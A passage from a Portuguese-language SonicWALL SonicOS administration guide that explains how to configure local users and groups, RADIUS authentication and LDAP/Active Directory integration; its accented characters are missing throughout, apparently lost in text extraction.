Usurios > Usurios locais. Para adicionar usurios locais ao banco de dados:
Etapa 1 Clique em Adicionar usurio. A janela de configurao Adicionar usurio exibida.

Etapa 2 Na guia Configuraes, insira o nome de usurio no campo Nome.
Etapa 3 No campo Senha, digite uma senha para o usurio. As senhas diferenciam maisculas de
minsculas e devem consistir em uma combinao de letras e nmeros, em vez de nomes de
membros da famlia, amigos ou animais de estimao.
Etapa 4 Confirme a senha digitando-a no campo Confirmar senha.
Etapa 5 Como alternativa, selecione a caixa de seleo O usurio deve alterar a senha para forar
os usurios a alterarem suas senhas no primeiro login. Selecione a caixa de seleo Exigir
senhas de uso nico para habilitar essa funcionalidade, exigindo que os usurios de SSL
VPN enviem uma senha gerada pelo sistema para a autenticao de dois fatores.

Dica Se um Usurio local no possuir uma senha de uso nico habilitada, embora um grupo ao
qual ela pertence esteja habilita, certifique-se de que o endereo de e-mail do usurio est
configurado; caso contrrio, esse usurio no poder efetuar login.
Etapa 6 Insira o endereo de e-mail do usurio para que ele possa receber senhas de uso nico.
Etapa 7 No menu suspenso Durao da conta, selecione Nunca expirar para tornar a conta
permanente. Ou selecione Minutos, Horas ou Dias para especificar uma durao aps a qual
a conta de usurio ser excluda ou desativada.
Se voc selecionar uma durao limitada, selecione a caixa de seleo Expurgar a
conta aps a expirao para excluir a conta de usurio aps a durao expirar.
Desative esta caixa de seleo para que a conta seja simplesmente desativada aps
a durao expirar. O administrador pode ento habilitar novamente a conta redefinindo
sua durao.
Etapa 8 Como alternativa, insira um comentrio no campo Comentrio.
Etapa 9 Na guia Grupos, em Grupos de usurios, selecione um ou mais grupos aos quais o usurio
pertencer e clique no boto de seta -> para mover o(s) nome(s) do grupo para a lista Membro
do. O usurio se tornar um membro dos grupos selecionados. Para remover o usurio de um
grupo, selecione o grupo da lista Membro do e clique no boto de seta para a esquerda <-.
Etapa 10 A guia Acesso VPN configura quais recursos da rede os usurios da VPN (marcadores do
GVC, NetExtender ou Virtual Office) podem acessar. Na guia Acesso VPN, selecione uma ou
mais redes da lista Redes e clique no boto de seta para a direita (->) para mov-las para a
coluna Lista de acesso. Para remover o acesso do usurio a uma rede, selecione a rede em
Lista de acesso e clique no boto de seta para a esquerda (<-).
NetExtender e Virtual Office para acessar os recursos da rede. Para permitir que os
usurios do GVC, NetExtender ou Virtual Office acessem um recurso da rede, os objetos
Acesso VPN.
Etapa 11 Na guia Marcador, os administradores podem adicionar, editar ou excluir marcadores do

Virtual Office para cada de usurio que seja membro de um grupo relacionado. Para obter
informaes sobre a configurao de marcadores do SSL VPN, consulte Configurao de
Marcadores SSL VPN na pgina 927.
Nota Os usurios devem ser membros do grupo de Servios do SSLVPN antes da configurao
de Marcadores para eles.
Etapa 12 Clique em OK para concluir a configurao do usurio.

Editando Usurios locais
possvel editar usurios locais na tela Usurios > Usurios locais. Para editar um usurio
local:
Etapa 1 Na lista de usurios, clique no cone de edio em Configurar na mesma linha que o do usurio
que deseja editar.
Etapa 2 Configure as guias Configuraes, Grupos, Acesso VPN e Marcador exatamente como para
a adio de um novo usurio. Consulte Adicionando Usurios locais na pgina 984.
Importando Usurios locais do LDAP

possvel configurar os usurios locais no firewall, recuperando os nomes de usurio do seu
servidor do LDAP. O boto Importar do LDAP... abre uma caixa de dilogo que contm a lista
de nomes de usurio disponveis para importao para o firewall.
Ter usurios no firewall com o mesmo nome de usurios do LDAP/AD existentes permite que
os privilgios de usurio do SonicWALL sejam concedidos aps a autenticao do LDAP.
A lista de usurios lidos do servidor do LDAP pode ser bastante longa e voc provavelmente
deseja importar somente um pequeno nmero deles. Um boto Remover da lista fornecido,
juntamente com vrios mtodos de seleo de usurios indesejados. possvel usar essas
opes para reduzir a lista a um tamanho gerencivel e ento selecionar os usurios que sero
importados.
Para importar usurios do servidor do LDAP:
Etapa 1 Na pgina Usurios > Configuraes, defina o Mtodo de autenticao para LDAP ou
LDAP + Usurios locais.
Etapa 2 Na pgina Usurios > Usurios locais, clique em Importar do LDAP....

Etapa 3 Na caixa de dilogo Usurios de importao do LDAP, possvel selecionar usurios
individuais ou todos os usurios. Para selecionar todos os usurios da lista, selecione a caixa
de seleo Selecionar/desmarcar todos na parte superior da lista. Para limpar todas as
selees, clique nela novamente.
Etapa 4 Para remover um ou mais usurios da lista exibida, selecione uma das opes a seguir
localizadas na parte inferior da pgina e, em seguida, clique em Remover da lista:
Para remover os usurios cujas caixas de seleo foram selecionadas, selecione o
boto de opo Todos os usurios selecionados.
Para remover determinados usurios com base no nome, descrio ou local, selecione
o boto de opo Qualquer usurio cujo <campo1 > contm <campo2>. Selecione
o nome, descrio ou local na lista suspensa do primeiro campo e digite o valor da
correspondncia no segundo campo.
Nessa opo, nome refere-se ao nome de usurio exibido na coluna esquerda da
lista, descrio refere-se descrio exibida direita (que no est presente para
todos os usurios) e local refere-se ao local do objeto de usurio no diretrio do LDAP.
O local, juntamente com o nome completo do usurio, exibido ao passar o mouse
sobre um nome de usurio, conforme mostrado na imagem acima.
Por exemplo, voc pode desejar remover as contas que esto marcadas como
Desativadas em suas descries. Nesse caso, selecione descrio no primeiro
campo e digite desativada no segundo campo. Como o segundo campo diferencia
maisculas de minsculas, se voc digitou desativada, voc expurgaria um conjunto
diferente de usurios.

Para remover determinados usurios da lista com base em seu local no diretrio do
LDAP, selecione o boto de opo Todos os usurios <campo1> <campo2>. No
primeiro campo, selecione em ou em ou abaixo na lista suspensa. No segundo campo,
selecione o local do diretrio do LDAP na lista suspensa.
Nota No necessrio remover usurios da lista para no precisar import-los. Isso

simplesmente simplifica a visualizao dos usurios restantes da lista. Se optar por no
fazer isso, possvel ir direto para Etapa 7.
Etapa 5 Repita a etapa anterior para expurgar usurios adicionais, at que voc tenha uma lista
gerencivel para selecionar para a importao.
Etapa 6 Para desfazer todas as alteraes feitas lista de usurios, clique em Desfazer e, em seguida,
clique em OK na caixa de dilogo de confirmao.
Etapa 7 Ao concluir a remoo das contas indesejadas, com as opes Remover da lista, use as
caixas de seleo na lista para selecionar as contas que sero importadas e, em seguida,
clique em Salvar selecionadas.
Configurando Grupos locais

Os grupos locais so exibidos na tabela Grupos locais. A tabela enumera Nome, Filtros de
Contedo de desvio, Servios de convidados, Admin (tipo de acesso), Acesso VPN e
Configurar.
Um grupo padro, Todos, listado na tabela. Clique no cone de edio na coluna

Configurar para revisar ou alterar as configuraes de Todos.
Consulte as sees a seguir para obter instrues de configurao:
Criando um grupo local na pgina 989
Importando Grupos locais do LDAP na pgina 991

Criando um grupo local
Esta seo descreve como criar um grupo local, mas tambm se aplica edio de grupos
locais existentes. Para editar um grupo local, clique no cone de edio na mesma linha do
grupo que voc deseja editar e, em seguida, siga as etapas deste procedimento.
Ao adicionar ou editar um grupo local, possvel adicionar outros grupos locais como membros
do grupo.
Para adicionar um grupo de usurios:
Etapa 1 Clique no boto Adicionar grupo para exibir a janela Adicionar grupo.
Etapa 2 Na guia Configuraes, insira um nome de usurio no campo Nome. Como alternativa,
possvel selecionar a caixa de seleo Os membros acessam diretamente a UI de
gerenciamento no login da web. Esta seleo somente se aplicar se este novo grupo
receber posteriormente a associao a outro grupo administrativo. Tambm possvel
selecionar a caixa de seleo Exigir senhas de uso nico para exigir que os usurios de SSL
VPN enviem uma senha gerada pelo sistema para a autenticao de dois fatores. Os usurios
devem definir seus endereos de e-mail quando este recurso estiver habilitado.
Nota Para o recurso da senha de uso nico, os usurios remotos podem ser controlados no nvel
do grupo. Os endereos de e-mail dos usurios do LDAP so recuperados do servidor
quando a autenticao original feita. Os usurios remotos autenticados por meio do

RADIUS exigem que os administradores insiram os endereos de e-mail manualmente na
interface de gerenciamento, a menos que as configuraes de usurio do RADIUS sejam
configuradas para Usar o LDAP para recuperar informaes do grupo de usurios.
Etapa 3 Na guia Membros, para adicionar usurios e outros grupos a este grupo, selecione o usurio
ou grupo da lista Usurios e grupos no membros e clique no boto de seta para a direita ->.
Etapa 4 A guia Acesso VPN configura quais recursos da rede os usurios da VPN (marcadores do
GVC, NetExtender ou Virtual Office) podem acessar. Na guia Acesso VPN, selecione uma ou
mais redes da lista Redes e clique no boto de seta para a direita (->) para mov-las para a
coluna Lista de acesso. Para remover o acesso do usurio a uma rede, selecione a rede em
Lista de acesso e clique no boto de seta para a esquerda (<-).
NetExtender e SSL VPN Virtual Office para acessar os recursos da rede. Para permitir que
os usurios do GVC, NetExtender ou Virtual Office acessem um recurso da rede, os objetos
Acesso VPN.

Nota possvel configurar a lista de Acesso do VPN SSL para vrios usurios no nvel de grupo.
Para fazer isso, crie um Objeto de endereo na interface de gerenciamento Rede > Objetos
de endereos, como para um servidor de arquivos pblico ao qual todos os usurios de um
grupo precisam do acesso. Como esse objeto recm-criado agora exibido na guia Acesso
VPN em Redes, possvel atribuir grupos, adicionando-os lista de acesso.
Etapa 5 Na guia Poltica do CFS, para impor uma poltica personalizada do Content Filtering Service
a esse grupo, selecione a poltica do CFS na lista suspensa Poltica.
Nota possvel criar polticas personalizadas do Content Filtering Service na pgina Servios
de Segurana > Filtro de Contedo. Consulte Servios de segurana > Filtro de contedo
na pgina 1165.
Etapa 6 Na guia Marcador, os administradores podem adicionar, editar ou excluir marcadores do

Virtual Office para cada grupo.
Importando Grupos locais do LDAP

possvel configurar os grupos locais no SonicOS, recuperando os nomes de grupo do usurio
de seu servidor do LDAP. O boto Importar do LDAP... boto inicia uma caixa de dilogo que
contm a lista de grupo de usurios nomes disponveis para importao para o SonicOS.
Ter grupos de usurios no SonicOS com o mesmo nome dos grupos de usurios do LDAP/AD
existentes permite que os privilgios e associaes a grupos do SonicWALL sejam concedidos
aps a autenticao do LDAP.

Para importar grupos do servidor do LDAP:
Etapa 1 Na pgina Usurios > Configuraes, defina o Mtodo de autenticao para LDAP.
Etapa 2 Na pgina Usurios > Grupos locais, clique em Importar do LDAP....
Etapa 3 Como alternativa, na caixa de dilogo Grupos de usurios de importao do LDAP,

selecione a caixa de seleo para os grupos que voc no deseja importar e, em seguida,
clique em Remover da lista.
Etapa 4 Para desfazer todas as alteraes feitas lista de grupos, clique em Desfazer e, em seguida,
clique em OK na caixa de dilogo de confirmao.
Etapa 5 Ao concluir a remoo da lista para um tamanho gerencivel, selecione a caixa de seleo para
cada grupo que voc deseja importar para o SonicOS e, em seguida, clique em Salvar
selecionados.

Configurando a autenticao RADIUS
Para obter uma apresentao autenticao RADIUS no SonicOS, consulte Usando o
RADIUS para a autenticao na pgina 954. Se voc tiver selecionado RADIUS ou RADIUS +
Usurios locais na lista suspensa Mtodo de autenticao para login na pgina Usurios >
Configuraes, o boto Configurar RADIUS se tornar disponvel.
Um boto separado Configurar para o RADIUS tambm est disponvel se voc tiver
selecionado Somente autenticao de NTLM no navegador na lista suspensa Mtodo de
Login nico. O processo de configurao o mesmo.
Etapa 1 Clique em Configurar RADIUS para configurar suas configuraes do servidor RADIUS no
SonicOS. A janela Configurao do RADIUS exibida.
Etapa 2 Em Configuraes globais do RADIUS, insira um valor para o Tempo limite do servidor do
RADIUS (segundos). O intervalo permitido de 1 a 60 segundos com um valor padro de 5.
Etapa 3 No campo Repeties, insira o nmero de vezes que o SonicOS tentar estabelecer contato
com o servidor do RADIUS. Se o servidor do RADIUS no responder dentro do nmero
especificado de novas tentativas, a conexo ser encerrada. Esse campo pode variar entre 0
e 10, com uma configurao recomendada de 3 tentativas do servidor do RADIUS.
Etapa 4 Na seo Servidores do RADIUS, possvel designar o servidor do RADIUS primrio e,
opcionalmente, o secundrio. Um servidor do RADIUS secundrio opcional pode ser definido
se um servidor do RADIUS de backup for existente na rede. Na seo Servidor primrio,
insira o nome do host ou endereo IP do servidor do RADIUS no campo Nome ou endereo IP.
Etapa 5 Digite a senha administrativa do servidor do RADIUS ou o segredo compartilhado no campo
Segredo compartilhado. O tamanho do Segredo compartilhado em alfanumricos pode
variar de 1 a 31 caracteres. O segredo compartilhado diferencia maisculas de minsculas.
Etapa 6 Insira o Nmero de porta para o servidor do RADIUS que ser utilizado para a comunicao
com o SonicOS. O padro 1812.

Etapa 7 Como alternativa, na seo Servidor Secundrio, insira o nome do host ou endereo IP do
servidor secundrio do RADIUS no campo Nome ou endereo IP.
Etapa 8 Digite a senha administrativa do servidor do RADIUS ou o segredo compartilhado no campo
Segredo compartilhado. O tamanho do Segredo compartilhado em alfanumricos pode
variar de 1 a 31 caracteres. O segredo compartilhado diferencia maisculas de minsculas.
Etapa 9 Insira o Nmero de porta para o servidor secundrio do RADIUS que ser utilizado para a
comunicao com o SonicOS. O padro 1812.
Usurios do RADIUS
Na guia Usurios do RADIUS, possvel especificar quais tipos de informaes locais ou do
LDAP sero utilizadas em combinao com a autenticao RADIUS. Tambm possvel definir
o grupo de usurios padro para os usurios do RADIUS.
.
Para definir as configuraes de usurios do RADIUS:
Etapa 1 Na guia Usurios do RADIUS, selecione Permitir apenas usurios listados localmente se
somente os usurios listados no banco de dados do SonicOS forem autenticados com o uso
do RADIUS.
Etapa 2 Selecione o mecanismo utilizado para configurar as associaes a grupos do usurio para os
usurios do RADIUS entre as seguintes opes:
Selecione Usar atributo especfico de fornecedor no servidor RADIUS para aplicar
um atributo especfico do fornecedor configurado do servidor do RADIUS. O atributo
deve fornecer o grupo de usurios ao qual o usurio pertence.
Selecione Usar atributo de ID de filtro do RADIUS no servidor RADIUS para aplicar
um atributo de ID do filtro configurado do servidor do RADIUS. O atributo deve fornecer
o grupo de usurios ao qual o usurio pertence.
Selecione Usar LDAP para recuperar informaes de grupo de usurios para obter
o grupo de usurios do servidor do LDAP. possvel clicar no boto Configurar para
configurar o LDAP se voc ainda no tiver configurado-o ou se voc precisar fazer uma

alterao. Para obter informaes sobre como configurar o LDAP, consulte
Configurando o dispositivo de segurana de rede Dell SonicWALL para o LDAP na
pgina 1001.
Se voc no pretende recuperar informaes do grupo de usurios do RADIUS ou
LDAP, selecione Somente configurao local.
Para um atalho para o gerenciamento de grupos de usurios do RADIUS, marque
Associaes tambm pode ser definido localmente pela duplicao de nomes de
usurios de RADIUS. Ao criar usurios com o mesmo nome localmente no dispositivo
da segurana e gerenciar suas associaes a grupos, as associaes no banco de
dados do RADIUS sero alteradas automaticamente para espelhar suas alteraes
locais.
Etapa 3 Se voc tiver configurado anteriormente os Grupos de usurios no SonicOS, selecione o grupo
na lista suspensa Grupo de usurios padro ao qual todos os usurios do RADIUS
pertencem.
Criando um novo Grupo de usurio para os Usurios do RADIUS
Na tela de Configuraes de usurios do RADIUS, possvel criar um novo grupo, escolhendo

Criar novo grupo de usurios... na lista suspensa Grupo de usurios padro ao qual todos
os usurios do RADIUS pertencem:
Etapa 1 Selecione Criar novo grupo de usurios... A janela Adicionar grupo exibida.
Etapa 2 Na guia Configuraes, insira um nome para o grupo. Tambm possvel digitar um
comentrio descritivo.

Etapa 3 Na guia Membros, selecione os membros do grupo. Selecione os usurios ou grupos que
deseja adicionar na coluna esquerda e clique no boto ->. Clique em Adicionar todos para
adicionar todos os usurios e grupos.
Nota possvel adicionar qualquer grupo como membro de outro grupo exceto Todos e Todos
os usurios do RADIUS. Fique atento s associaes de grupos que voc adiciona como
membros de outro grupo.
Etapa 4 Na guia Acesso VPN, selecione os recursos da rede aos quais este grupo ter o Acesso VPN
por padro.
Nota As configuraes de acesso VPN do grupo afetam os clientes remotos e os marcadores do

SSL VPN Virtual Office.
Etapa 5 Se voc possuir o Content Filtering Service (CFS) em seu dispositivo de segurana, possvel
configurar a poltica de filtragem de contedo para esse grupo na guia Poltica do CFS.
Consulte para obter instrues sobre como se registrar e gerenciar o SonicWALL Content
Filtering Service.

RADIUS com o LDAP para Grupos de usurios
Quando o RADIUS for utilizado para a autenticao de usurios, existe uma opo na pgina
Usurios do RADIUS na configurao do RADIUS para permitir que o LDAP seja selecionado
como o mecanismo para configurar as associaes a grupos do usurio para os usurios do
RADIUS:
Quando Usar LDAP para recuperar informaes de grupo dos usurios estiver
selecionado, depois de autenticar um usurio por meio do RADIUS, suas informaes de
associao de grupo de usurios sero pesquisadas por meio do LDAP no diretrio no servidor
do LDAP/AD.
Nota Se esse mecanismo no estiver selecionado e a senha de uso nico estiver habilitada, um
usurio do RADIUS receber uma mensagem de falha da senha de uso nico durante a
tentativa de efetuar login por meio do SSL VPN.
Ao clicar no boto Configurar, a janela de configurao do LDAP exibida.

Observe que, nesse caso, o LDAP no est lidando com senhas de usurio e as informaes
que ele l do diretrio so geralmente irrestritas; portanto, a operao sem o TLS pode ser
selecionada, ignorando os avisos, se o TLS no estiver disponvel (por ex., se os servios de
certificado no estiverem instalados com o Active Directory). No entanto, deve-se garantir que
a segurana no seja comprometida por meio do login de texto no criptografado pelo SonicOS
no servidor do LDAP por ex., criar uma conta de usurio com acesso somente leitura para o
diretrio dedicado para uso do SonicOS. Neste caso, no use a conta de administrador.
Para obter mais informaes sobre como definir as configuraes do LDAP, consulte
Configurando a integrao do LDAP no SonicOS na pgina 999.

Teste do cliente do RADIUS
Na caixa de dilogo Configurao do RADIUS, possvel testar seu nome de usurio, senha
e outras configuraes do Cliente do RADIUS, digitando um nome de usurio vlido e uma
senha e selecionando uma das opes para autenticao para Testar. Observe que esta opo
aplicar quaisquer alteraes que tenham sido realizadas.
Para testar as configuraes do RADIUS:
Etapa 1 No campo Usurio, digite um nome de login do RADIUS vlido.

Etapa 2 No campo Senha, digite a senha.
Etapa 3 Para Testar, selecione uma das seguintes opes:
Autenticao de senha: Selecione esta opo para usar a senha para autenticao.
CHAP: Selecione esta opo para usar o Challenge Handshake Authentication
Protocol. Aps a verificao inicial, o CHAP verifica periodicamente a identidade do
cliente usando um handshake de trs vias.
MSCHAP: Selecione esta opo para usar a implementao da Microsoft do CHAP. O
CHAP funciona para todas as verses do Windows anteriores ao Windows Vista.
MSCHAPv2: Selecione esta opo para usar a implementao do CHAP verso 2 da
Microsoft. O MSCHAPv2 funciona no Windows 2000 e verses posteriores do
Windows.
Etapa 4 Clique no boto Testar. Se a validao for bem-sucedida, as mensagens de Status sero
alteradas para xito. Em caso de falha na validao, a mensagem de Status ser alterada
para Falha.
Para concluir a configurao do RADIUS, clique em OK.
Depois que o SonicOS tiver sido configurado, uma Associao de Segurana da VPN que
exige a autenticao do RADIUS solicitar que os clientes da VPN de entrada digitem um
Nome de usurio e uma Senha em uma caixa de dilogo.

Configurando a integrao do LDAP no SonicOS
A integrao do seu firewall a um servio do diretrio do LDAP requer a configurao de seu
servidor do LDAP para o gerenciamento de certificados, por meio da instalao do certificado
correto em seu firewall e configurando o firewall para usar as informaes do servidor do LDAP.
Para obter uma apresentao do LDAP, consulte Usando a autenticao LDAP/Active
Directory/eDirectory na pgina 955.
Preparando seu servidor do LDAP para a integrao na pgina 999
Configurando o dispositivo de segurana de rede Dell SonicWALL para o LDAP na
pgina 1001
Preparando seu servidor do LDAP para a integrao

Antes de iniciar a configurao do LDAP, necessrio preparar seu servidor do LDAP e o
SonicWALL para o suporte do LDAP sobre TLS. Essa configurao requer:
A instalao de um certificado do servidor em seu servidor do LDAP.
A instalao de um certificado de CA (Autoridade de Certificado) para a CA emissora em
seu firewall.
Os procedimentos a seguir descrevem como realizar essas tarefas em um ambiente do Active
Directory.
Configurando a CA no servidor do Active Directory
Para configurar a CA no servidor do Active Directory (ignore as cinco primeiras etapas se os

Servios de Certificado j estiverem instalados):
Etapa 1 V at Iniciar > Configuraes > Painel de controle > Adicionar/Remover programas
Etapa 2 Selecione Adicionar/Remover componentes do Windows
Etapa 3 Selecione Servios de certificados
Etapa 4 Selecione CA raiz corporativa, quando solicitado.
Etapa 5 Insira as informaes solicitadas. Para obter informaes sobre os certificados nos sistemas
do Windows, consulte http://support.microsoft.com/kb/931125.
Etapa 6 Inicie o aplicativo Poltica de segurana do domnio: V at Iniciar > Executar e execute o
comando: dompol.msc.
Etapa 7 Abra Configuraes de segurana > Polticas de Chave pblica.
Etapa 8 Clique com o boto direito em Configuraes de solicitao automtica de certificados.
Etapa 9 Selecione Nova > Solicitao automtica de certificados.
Etapa 10 Siga as etapas do assistente e selecione Controlador do domnio da lista.

Exportando o Certificado da CA do servidor do Active Directory
Para exportar o certificado da CA do servidor do AD:
Etapa 1 Inicie o aplicativo Autoridade de certificao: Iniciar > Executar > certsrv.msc.
Etapa 2 Clique com o boto direito na CA criada e selecione propriedades.
Etapa 3 Na guia Geral, clique no boto Exibir certificado.
Etapa 4 Na guia Detalhes, selecione Copiar para arquivo.
Etapa 5 Siga as etapas do assistente e selecione o formato Base 64 codificada X.509 (.cer).
Etapa 6 Especifique um caminho e um nome de arquivo para salvar o certificado.
Importando o certificado da CA para o SonicOS
Para importar o certificado da CA para o SonicOS:
Etapa 1 V at Sistema > Certificados da CA.

Etapa 2 Selecione Adicionar novo certificado da CA. Procure e selecione o arquivo do certificado
exportado.
Etapa 3 Clique no boto Importar certificado.

Configurando o dispositivo de segurana de rede Dell SonicWALL para o LDAP
A pgina Usurios > Configuraes da interface administrativa fornece as configuraes
para o gerenciamento da integrao do LDAP:
Etapa 1 Na interface administrativa do SonicOS, abra a pgina Usurios > Configuraes .

Etapa 2 Na lista suspensa Mtodo de autenticao para login, selecione LDAP ou LDAP + Usurios
locais.
Etapa 3 Clique em Configurar.

Etapa 4 Se voc estiver conectado ao firewall por meio do HTTP, em vez do HTTPS, voc visualizar
uma caixa de dilogo de aviso sobre a natureza confidencial das informaes armazenadas
nos servios de diretrio, que solicitar a alterao de sua conexo para HTTPS. Se voc tiver
o gerenciamento do HTTPS habilitado para a interface qual voc est conectado
(recomendado), clique em Sim.
Etapa 5 Na guia Configuraes da janela Configurao do LDAP, configure os seguintes campos:
Nome ou endereo IP O FQDN ou o endereo IP do servidor do LDAP em relao

ao qual voc deseja autenticar. Se estiver usando um nome, certifique-se de que ele
possa ser resolvido pelo seu servidor DNS. Alm disso, se estiver usando o TLS com
a opo Solicitar certificado vlido do servidor, o nome fornecido aqui dever
corresponder ao nome para o qual o certificado do servidor foi emitido (por ex., CN) ou
ocorrer uma falha na troca do TLS.

Nmero da porta O nmero de porta do LDAP padro sobre TLS TCP 636. O
nmero de porta do LDAP padro (no criptografado) TCP 389. Se estiver usando
uma porta de escuta personalizada no servidor do LDAP, especifique-a aqui.
Tempo limite do servidor A quantidade de tempo, em segundos, que o SonicOS
aguardar por uma resposta do servidor do LDAP antes do tempo limite. Os intervalos
permitidos so de 1 a 99999 (caso o servidor do LDAP esteja sendo executado em um
VIC-20 localizado na lua), com um padro de 10 segundos.
Tempo limite geral da operao A quantidade de tempo, em minutos, que ser
gasto em qualquer operao automtica. Algumas operaes, como a configurao do
diretrio ou a importao de grupos do usurio, podem demorar vrios minutos,
especialmente quando vrios servidores do LDAP estiverem sendo utilizados.
Selecione um dos botes de opo a seguir:
Login annimo Alguns servidores do LDAP permitem que a rvore seja acessada
de forma annima. Se seu servidor oferecer suporte para essa opo (o Active
Directory geralmente no oferece), ento possvel selecionar esta opo.
Fornecer nome de login/local na rvore Selecione esta opo para criar o nome
distinto (dn) que utilizado para se vincular ao servidor do LDAP a partir dos campos
Nome de usurio de login e rvore do usurio para login ao servidor, de acordo com
as regras a seguir:
O componente do primeiro nome comea com cn=
Todos os componentes local na rvore utilizam ou= (alm de alguns elementos
internos do Active Directory que comeam com cn=)
Todos os componentes do domnio utilizam dc=
Se o campo rvore do usurio para login no servidor for fornecido como um dn,
tambm possvel selecionar esta opo se o dn de ligao estiver de acordo com
o primeiro marcador acima, mas no com o segundo e/ou terceiro marcador.
Fornecer o nome distinto de ligao Selecione esta opo se o dn de ligao
no estiver de acordo com o primeiro marcador acima (se o componente do
primeiro nome no comear com cn=). Essa opo sempre pode ser selecionada
se o dn for conhecido. necessrio fornecer o dn de ligao explicitamente se ele
no estiver de acordo com o primeiro marcador acima.
Nome de usurio de login Especifique um nome de usurio que tenha direitos para
efetuar login no diretrio do LDAP. O nome de login ser apresentado automaticamente
para o servidor do LDAP na notao dn completa. Ele pode ser qualquer conta com
privilgios de leitura do LDAP (basicamente qualquer conta de usurio) No so
necessrios privilgios administrativos. Observe que esse o nome do usurio, e no
a ID de login (por ex., Joo da Silva em vez de jsilva).
Senha de login A senha para a conta de usurio especificada acima.
Verso do protocolo Selecione LDAPv3 ou LDAPv2. As implementaes mais
modernas do LDAP, incluindo o Active Directory, utilizam o LDAPv3.
Usar TLS Use a Transport Layer Security (SSL) para efetuar login no servidor do
LDAP. altamente recomendvel usar o TLS para proteger as informaes de nome
do usurio e senha que sero enviadas pela rede. As implementaes mais modernas
do servidor do LDAP, incluindo o Active Directory, oferecem suporte para o TLS.
Desmarcar essa configurao padro exibir um alerta que voc dever aceitar para
continuar.
Enviar solicitao Iniciar TLS do LDAP Algumas implementaes do servidor do
LDAP oferecem suporte para a diretiva Iniciar TLS em vez do uso do LDAP nativo
sobre TLS. Isso permite que o servidor do LDAP escute em uma nica porta

(geralmente 389) para as conexes do LDAP e alterne para o TLS, conforme indicado
pelo cliente. O Active Directory no usa essa opo e ele deve ser selecionado
somente se solicitado pelo servidor do LDAP.
Solicitar certificado vlido do servidor Valida o certificado apresentado pelo
servidor durante a troca do TLS, fazendo a correspondncia do nome especificado
acima com o nome no certificado. Desmarcar essa opo padro exibir um alerta,
mas as trocas entre o SonicOS e o servidor do LDAP ainda utilizaro o TLS somente
na validao sem emisso.
Certificado local para TLS Opcional, a ser utilizado somente se o servidor do LDAP
solicitar um certificado do cliente para as conexes. Este recurso til para as
implementaes do servidor do LDAP que retornam senhas para garantir a identidade
do cliente do LDAP (o Active Directory no retorna senhas). Esta configurao no
necessria para o Active Directory.
Se sua rede utiliza vrios servidores do LDAP/AD com recomendaes, selecione um
como o servidor primrio (provavelmente aquele que contm a maior parte dos
usurios) e utilize as configuraes acima para esse servidor. Ele consultar o
SonicOS aos outros servidores para os usurios em domnios diferentes do seu
prprio. Para que o SonicOS possa efetuar login nesses outros servidores, cada
servidor deve ter um usurio configurado com as mesmas credenciais (nome de
usurio, senha e local no diretrio) como o login para o servidor primrio. Isso pode
envolver a criao de um usurio especial no diretrio para o login no SonicOS.
Observe que necessrio o acesso somente leitura para o diretrio.
Etapa 6 Na guia Esquema, configure os campos a seguir:
Etapa 7 Esquema do LDAP Selecione uma das seguintes opes:

RFC2798 inetOrgPerson
Samba SMB
Novell eDirectory

Definido pelo usurio
Selecionar qualquer um dos esquemas predefinidos preencher automaticamente os
campos utilizados por esse esquema com seus valores corretos. Selecionar Definido
pelo usurio permitir que voc especifique seus prprios valores use esta opo
somente se voc tiver uma configurao de esquema do LDAP especfica ou exclusiva.
Etapa 8 Classe de objeto Selecione o atributo que representa a conta de usurios individuais aos
quais se aplicam os dois campos a seguir.
Etapa 9 Atributo do nome de login Selecione uma das seguintes opes para definir o atributo que
utilizado para a autenticao de login:
sAMAccountName para o Microsoft Active Directory
inetOrgPerson para o RFC2798 inetOrgPerson
posixAccount para o RFC2307 Network Information Service
sambaSAMAccount para o Samba SMB
inetOrgPerson para o Novell eDirectory
Etapa 10 Atributo do nome de login qualificado Como alternativa, selecione um atributo de um
objeto de usurio que define um nome de login alternativo para o usurio no formato
nome@domnio. Isso pode ser necessrio com vrios domnios em particular, nos quais o
nome de login simples pode no ser exclusivo nos domnios. Isso definido para
correspondncia para o Microsoft Active Directory e o RFC2798 inetOrgPerson.
Etapa 11 Atributo de associao a grupos de usurios Selecione o atributo que contm
informaes sobre os grupos ao qual o objeto de usurio pertence. Ele designado memberOf
no Microsoft Active Directory. Os outros esquemas predefinidos armazenam informaes de
associao a grupos no objeto de grupo em vez de no objeto de usurio e, portanto, no
utilizam este campo.
Etapa 12 Atributo de endereo IP com moldura Selecione o atributo que pode ser utilizado para
recuperar um endereo IP esttico atribudo a um usurio no diretrio. Atualmente, ele
utilizado somente para um usurio que esteja se conectando por meio do L2TP com o servidor
do L2TP do SonicOS. Em verses futuras, ele tambm poder ser suportado para o Cliente
Global da VPN. No Active Directory, o endereo IP esttico configurado na guia Discar das
propriedades de um usurio.
Etapa 13 Objetos de grupos de usurios Esta seo configurada automaticamente, a menos que
Definido pelo usurio para o Esquema do LDAP seja selecionado.
Classe de objeto Especifique o nome associado ao grupo de atributos.
Atributo de membro Especifique o atributo associado a um membro.
Selecione se esse atributo um Nome distinto ou uma ID de usurio.
Ler do servidor Clique para ler as informaes do objeto de grupo de usurios do
servidor do LDAP.

Selecione se deseja Atualizar automaticamente a configurao do esquema ou
Exportar detalhes do esquema.
Etapa 14 Na guia Diretrio, configure os campos a seguir:
Domnio primrio O domnio do usurio utilizado pela implementao do LDAP.

Para o AD, ele ser o nome de domnio do Active Directory como, por ex.,
yourADdomain.com. As alteraes feitas neste campo, opcionalmente, atualizaro
automaticamente as informaes da rvore no restante da pgina. Isso definido para
mydomain.com por padro para todos os esquemas, exceto o Novell eDirectory, para
o qual ele definido como o=mydomain.
rvore do usurio para login no servidor A rvore na qual o usurio especificado
na guia Configuraes reside. Por exemplo, no Active Directory, a rvore padro da
conta do administrador a mesma que a rvore do usurio.
rvores que contm usurios As rvores onde os usurios geralmente residem no
diretrio do LDAP. Um valor padro fornecido e ele pode ser editado, e at um total
de 64 valores de DN podem ser fornecidos. O SonicOS procurar o diretrio usando
todos eles, at que uma correspondncia seja encontrada ou a lista seja esgotada. Se
voc criou outros recipientes de usurio em seu diretrio do LDAP ou AD, especifique-
os aqui.
rvores que contm grupos de usurio O mesmo que acima, somente em relao
aos recipientes do grupo de usurios e um mximo de 32 valores de DN podem ser
fornecidos. Eles se aplicam somente aos casos em que no h nenhum atributo de
associao a grupos do usurio no objeto de usurio do esquema e nos casos em que
ela no utilizada com o AD.
Todas as rvores acima so geralmente fornecidas em formato URL, mas tambm
podem ser especificadas como nomes distintos (por ex., myDom.com/Sales/Users
poderia, opcionalmente, ser fornecido como o DN
